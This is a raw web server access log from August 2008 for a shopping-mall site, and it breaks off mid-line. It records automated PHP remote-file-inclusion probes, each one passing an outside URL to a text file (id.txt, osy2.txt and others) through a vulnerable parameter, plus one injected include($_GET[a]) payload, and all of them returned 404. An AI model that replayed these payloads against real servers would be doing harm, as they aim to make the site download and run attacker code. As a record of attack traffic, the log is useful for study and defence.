218.38.18.28 - - [27/Aug/2008:00:51:29 -0700] "GET /logs/access_080801.log//components/com_simpleboard/file_upload.php?sbp=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:51:36 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
217.128.122.28 - - [27/Aug/2008:00:52:10 -0700] "GET /logs/access_080725.log%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
217.128.122.28 - - [27/Aug/2008:00:53:09 -0700] "GET /logs/access_080725.log%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
59.126.46.141 - - [27/Aug/2008:00:53:20 -0700] "GET /logs/access_080810.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
193.110.89.6 - - [27/Aug/2008:00:54:48 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.110.89.6 - - [27/Aug/2008:00:54:48 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.110.89.6 - - [27/Aug/2008:00:54:49 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:54:53 -0700] "GET /logs/access.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:54:54 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:54:54 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:55:35 -0700] "GET /logs/access_080804.log/myevent.php?myevent_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:55:37 -0700] "GET /myevent.php?myevent_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:55:39 -0700] "GET /logs/myevent.php?myevent_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:55:58 -0700] "GET /logs/access.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:55:58 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:55:59 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
204.214.80.199 - - [27/Aug/2008:00:56:05 -0700] "GET /errors.php?error=http://aocbots.com/cms/test.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.oldfactorymall.com"
204.214.80.199 - - [27/Aug/2008:00:56:05 -0700] "GET /logs/errors.php?error=http://aocbots.com/cms/test.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:56:37 -0700] "GET /logs/access_080720.log/myevent.php?myevent_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:56:38 -0700] "GET /logs/access_080804.log/myevent.php?myevent_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:56:40 -0700] "GET /myevent.php?myevent_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:56:42 -0700] "GET /logs/myevent.php?myevent_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
204.214.80.199 - - [27/Aug/2008:00:57:23 -0700] "GET /logs/errors.php?error=http://aocbots.com/cms/test.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.oldfactorymall.com"
204.214.80.199 - - [27/Aug/2008:00:57:23 -0700] "GET /errors.php?error=http://aocbots.com/cm